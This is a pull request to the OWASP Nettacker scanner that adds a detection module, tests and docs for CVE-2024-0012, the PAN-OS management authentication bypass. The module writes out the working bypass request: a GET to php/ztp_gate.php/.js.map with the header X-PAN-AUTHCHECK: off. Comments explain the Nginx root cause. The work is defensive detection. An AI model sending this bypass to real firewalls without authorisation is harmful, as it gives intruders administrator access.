### PR TITLE
feat(modules): add CVE-2024-0012 Palo Alto PAN-OS detection module

### DIFF
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -221,6 +221,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**novnc_cve_2021_3654_vuln**' – check the target for noVNC CVE-2021-3654 vulnerability
 - '**omigod_cve_2021_38647_vuln**' – check the target for OMIGOD CVE-2021-38647 vulnerability
 - '**paloalto_globalprotect_cve_2025_0133_vuln**' – check the target for PaloAlto GlobalProtect CVE-2025-0133 XSS vulnerability
+- '**paloalto_panos_cve_2024_0012_vuln**' – check the target for PaloAlto PAN-OS CVE-2024-0012 authentication bypass vulnerability (CVSS 9.3, CISA KEV)
 - '**paloalto_panos_cve_2025_0108_vuln**' – check the target for PaloAlto PAN-OS CVE-2025-0108 vulnerability
 - '**payara_cve_2021_41381_vuln**' – check the target for Payara CVE-2021-41381 vulnerability
 - '**phpinfo_cve_2021_37704_vuln**' – check the target for phpinfo CVE-2021-37704 information disclosure

--- a/nettacker/modules/vuln/paloalto_panos_cve_2024_0012.yaml
+++ b/nettacker/modules/vuln/paloalto_panos_cve_2024_0012.yaml
@@ -1,0 +1,100 @@
+# CVE-2024-0012 — PAN-OS Management Interface Authentication Bypass
+#
+# Root cause: On vulnerable PAN-OS versions, Nginx does not unconditionally set
+# X-pan-AuthCheck: on before proxying requests. The .js.map location block
+# lacked a proxy_default.conf include, so the X-PAN-AUTHCHECK header could be
+# supplied by the client. The PHP backend (uiEnvSetup.php) reads this header
+# and skips authentication when the value is "off".
+#
+# Detection method: Send a GET request to the ZTP (Zero Touch Provisioning)
+# endpoint using the .js.map suffix path confusion, with the X-PAN-AUTHCHECK
+# header set to "off". A vulnerable target returns HTTP 200 with the ZTP page
+# title. A patched target returns HTTP 302 redirecting to /php/login.php.
+#
+# This probe is non-destructive — the ZTP page is read-only.
+#
+# References:
+#   - https://security.paloaltonetworks.com/CVE-2024-0012  (vendor advisory)
+#   - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
+#   - https://nvd.nist.gov/vuln/detail/CVE-2024-0012
+#
+# Affected: PAN-OS 10.2 < 10.2.12-h2, 11.0 < 11.0.6-h1,
+#           11.1 < 11.1.5-h1, 11.2 < 11.2.4-h1
+# Products: PA-Series, VM-Series, CN-Series firewalls, Panorama
+# NOT affected: Cloud NGFW, Prisma Access
+
+info:
+  name: paloalto_panos_cve_2024_0012_vuln
+  author: OWASP Nettacker Team
+  severity: 9.3
+  description: >
+    CVE-2024-0012 is a critical authentication bypass in the Palo Alto Networks
+    PAN-OS management web interface. An unauthenticated attacker with network
+    access can gain PAN-OS administrator privileges by sending a crafted HTTP
+    request with the X-PAN-AUTHCHECK header set to off. This module detects
+    vulnerable instances by probing the Zero Touch Provisioning endpoint via
+    an Nginx path confusion technique. Affected versions are PAN-OS 10.2, 11.0,
+    11.1, and 11.2 (prior to the respective hotfixes).
+  reference:
+    - https://security.paloaltonetworks.com/CVE-2024-0012
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-0012
+    - https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/
+    - https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474/
+  profiles:
+    - vuln
+    - vulnerability
+    - http
+    - critical_severity
+    - cve
+    - paloalto
+    - paloalto_panos
+    - panos
+    - cisa_kev
+
+payloads:
+  - library: http
+    steps:
+      - method: get
+        timeout: 3
+        headers:
+          User-Agent: "{user_agent}"
+          # The bypass header — on vulnerable versions, Nginx does not override
+          # this value, so the PHP backend reads it and skips auth checks.
+          X-PAN-AUTHCHECK: "off"
+        allow_redirects: false
+        ssl: false
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}/{{paths}}"
+            prefix: ""
+            suffix: ""
+            interceptors:
+            data:
+              paths:
+                # The .js.map suffix exploits an Nginx location block that
+                # lacked the proxy_default.conf include on vulnerable versions,
+                # allowing the client-supplied X-PAN-AUTHCHECK header to pass
+                # through to the PHP backend without being overridden to "on".
+                - "php/ztp_gate.php/.js.map"
+              schema:
+                - "http"
+                - "https"
+              ports:
+                - 80
+                - 443
+                - 4443
+                - 8443
+        response:
+          condition_type: and
+          conditions:
+            # Condition 1: Vulnerable target returns HTTP 200.
+            # Patched target returns HTTP 302 (redirect to /php/login.php).
+            status_code:
+              regex: "200"
+              reverse: false
+            # Condition 2: The response body must contain the PAN-OS ZTP page
+            # title. This is a strong product-specific fingerprint that
+            # eliminates false positives from generic web servers.
+            content:
+              regex: "(?i)<title>\\s*Zero Touch Provisioning\\s*</title>"
+              reverse: false

--- a/tests/modules/test_paloalto_panos_cve_2024_0012.py
+++ b/tests/modules/test_paloalto_panos_cve_2024_0012.py
@@ -1,0 +1,181 @@
+"""
+Tests for the CVE-2024-0012 PAN-OS authentication bypass detection module.
+
+Validates three scenarios:
+  1. True positive — vulnerable target returns HTTP 200 + ZTP page
+  2. True negative — patched target returns HTTP 302 redirect
+  3. True negative — non-PAN-OS host returns HTTP 200 but no ZTP content
+"""
+
+import os
+
+import pytest
+import yaml
+
+from nettacker.core.lib import http
+
+MODULE_PATH = os.path.join(
+    os.path.dirname(__file__),
+    "..",
+    "..",
+    "nettacker",
+    "modules",
+    "vuln",
+    "paloalto_panos_cve_2024_0012.yaml",
+)
+
+
+EXPECTED_PROBE_PATH = "php/ztp_gate.php/.js.map"
+
+
+@pytest.fixture(scope="module")
+def module_step():
+    """Load the module YAML and return the first payload step.
+
+    Also verifies probe request invariants:
+      - The expected probe path is present in the URL fuzzer data.
+      - The X-PAN-AUTHCHECK bypass header is set to 'off'.
+    """
+    with open(MODULE_PATH) as f:
+        data = yaml.safe_load(f)
+    step = data["payloads"][0]["steps"][0]
+
+    # Verify probe path is configured correctly
+    paths = step["url"]["nettacker_fuzzer"]["data"]["paths"]
+    assert EXPECTED_PROBE_PATH in paths, (
+        f"Expected probe path '{EXPECTED_PROBE_PATH}' not found in module paths: {paths}"
+    )
+
+    # Verify bypass header is present (case-insensitive lookup)
+    headers = {k.lower(): v for k, v in step["headers"].items()}
+    assert headers.get("x-pan-authcheck") == "off", (
+        "X-PAN-AUTHCHECK header must be set to 'off' for the bypass to work"
+    )
+
+    return step
+
+
+class TestCVE20240012TruePositive:
+    """Vulnerable PAN-OS target: HTTP 200 with ZTP page title."""
+
+    def test_vulnerable_target_matches(self, module_step):
+        """
+        Test that the module successfully triggers on a vulnerable PAN-OS target.
+
+        A true positive is defined as an HTTP 200 response containing the exact
+        'Zero Touch Provisioning' string in its body.
+        """
+        response = {
+            "status_code": "200",
+            "url": "https://10.0.0.1:443/php/ztp_gate.php/.js.map",
+            "reason": "OK",
+            "headers": {
+                "Content-Type": "text/html; charset=UTF-8",
+                "X-Content-Type-Options": "nosniff",
+                "Strict-Transport-Security": "max-age=31536000",
+            },
+            "responsetime": 0.15,
+            "content": (
+                "<html><head><title>Zero Touch Provisioning</title></head>"
+                "<body><h1>Device Registered</h1></body></html>"
+            ),
+        }
+        result = http.response_conditions_matched(module_step, response)
+        assert result != {}, "Module must fire on a vulnerable PAN-OS target"
+        assert result["status_code"] == ["200"]
+        assert "Zero Touch Provisioning" in result["content"][0]
+
+
+class TestCVE20240012PatchedTarget:
+    """Patched PAN-OS target: HTTP 302 redirect to login page."""
+
+    def test_patched_target_does_not_match(self, module_step):
+        """
+        Test that the module safely ignores a patched PAN-OS target.
+
+        A patched system redirects the unauthenticated user back to the login
+        page via an HTTP 302 response, which must not trigger the module.
+        """
+        response = {
+            "status_code": "302",
+            "url": "https://10.0.0.1:443/php/ztp_gate.php/.js.map",
+            "reason": "Found",
+            "headers": {
+                "Location": "/php/login.php?",
+                "Content-Type": "text/html; charset=UTF-8",
+                "Set-Cookie": "PHPSESSID=abc123; path=/; HttpOnly",
+            },
+            "responsetime": 0.12,
+            "content": "",
+        }
+        result = http.response_conditions_matched(module_step, response)
+        assert result == {}, "Module must NOT fire on a patched PAN-OS target"
+
+
+class TestCVE20240012NonTarget:
+    """Non-PAN-OS host returning HTTP 200 but without ZTP content."""
+
+    def test_generic_webserver_does_not_match(self, module_step):
+        """
+        Test that the module does not trigger on a generic webserver.
+
+        Even if the server returns an HTTP 200 OK, the absence of the
+        specific Zero Touch Provisioning title must prevent a match.
+        """
+        response = {
+            "status_code": "200",
+            "url": "https://10.0.0.2:443/php/ztp_gate.php/.js.map",
+            "reason": "OK",
+            "headers": {
+                "Content-Type": "text/html",
+                "Server": "nginx/1.25.3",
+            },
+            "responsetime": 0.05,
+            "content": (
+                "<html><head><title>Welcome to nginx!</title></head>"
+                "<body><h1>Welcome to nginx!</h1></body></html>"
+            ),
+        }
+        result = http.response_conditions_matched(module_step, response)
+        assert result == {}, "Module must NOT fire on a non-PAN-OS generic web server"
+
+    def test_404_does_not_match(self, module_step):
+        """
+        Test that the module does not trigger on HTTP 404 Not Found responses.
+
+        Requests to non-existent PAN-OS management ports or arbitrary generic
+        servers returning 404 must be safely ignored.
+        """
+        response = {
+            "status_code": "404",
+            "url": "https://10.0.0.3:8443/php/ztp_gate.php/.js.map",
+            "reason": "Not Found",
+            "headers": {"Content-Type": "text/html"},
+            "responsetime": 0.03,
+            "content": "<html><body><h1>404 Not Found</h1></body></html>",
+        }
+        result = http.response_conditions_matched(module_step, response)
+        assert result == {}, "Module must NOT fire on a 404 response"
+
+    def test_200_with_partial_ztp_string_does_not_match(self, module_step):
+        """
+        Ensure regex doesn't match partial strings that aren't actually ZTP.
+
+        Validates that the specific regex pattern correctly requires the full
+        'Zero Touch Provisioning' string and won't false positive on substrings.
+        The content includes 'Zero Touch' (partial) but NOT the full
+        'Zero Touch Provisioning' title required by the detection regex.
+        """
+        response = {
+            "status_code": "200",
+            "url": "https://10.0.0.4:443/php/ztp_gate.php/.js.map",
+            "reason": "OK",
+            "headers": {"Content-Type": "text/html"},
+            "responsetime": 0.08,
+            "content": (
+                "<html><head><title>Zero Touch</title></head>"
+                "<body>Not full ZTP title.</body></html>"
+            ),
+        }
+        result = http.response_conditions_matched(module_step, response)
+        assert result == {}, "Module must NOT fire when content lacks ZTP title"


### PR DESCRIPTION
## Proposed change

Adds a new detection module for **CVE-2024-0012**, a critical authentication bypass vulnerability in Palo Alto Networks PAN-OS software.

The detection logic relies on an Nginx path confusion exploit primitive:
- Sends an HTTP GET request to `/php/ztp_gate.php/.js.map`
- Injects the `X-PAN-AUTHCHECK: off` header (which the vulnerable Nginx proxy fails to override due to the missing `proxy_default.conf` include on `.js.map` URIs)
- Matches on HTTP `200` AND `<title>Zero Touch Provisioning</title>` in the response body.

This logic is designed to **minimize false positives** because patched hosts correctly decline the bypass (returning an HTTP 302 redirect to `/php/login.php`), and non-target generic web servers are unlikely to contain the PAN-OS-specific ZTP page title.


## Type of change

- [ ] New core framework functionality
- [ ] Bugfix (non-breaking change which fixes an issue)
- [ ] Code refactoring without any functionality changes
- [x] New or existing module/payload change
- [ ] Documentation/localization improvement
- [ ] Test coverage improvement
- [ ] Dependency upgrade
- [ ] Other improvement (best practice, cleanup, optimization, etc)

## Checklist

- [x] I've followed the [contributing guidelines][contributing-guidelines]
- [x] I have **digitally signed** all my commits in this PR
- [x] I've run `make pre-commit` and confirm it didn't generate any warnings/changes
- [x] I've run `make test`, I confirm all tests passed locally
- [x] I've added/updated any relevant documentation in the `docs/` folder 
- [ ] I've linked this PR with an open issue
- [x] I've tested and verified that my code works as intended and resolves the issue as described
- [ ] I have attached screenshots demonstrating my code works as intended
- [x] I've checked all other open PRs to avoid submitting duplicate work
- [x] I confirm that the code and comments in this PR are not direct unreviewed outputs of AI
- [x] I confirm that I am the Sole Responsible Author for every line of code, comment, and design decision

[contributing-guidelines]: https://nettacker.readthedocs.io/en/latest/Developers/


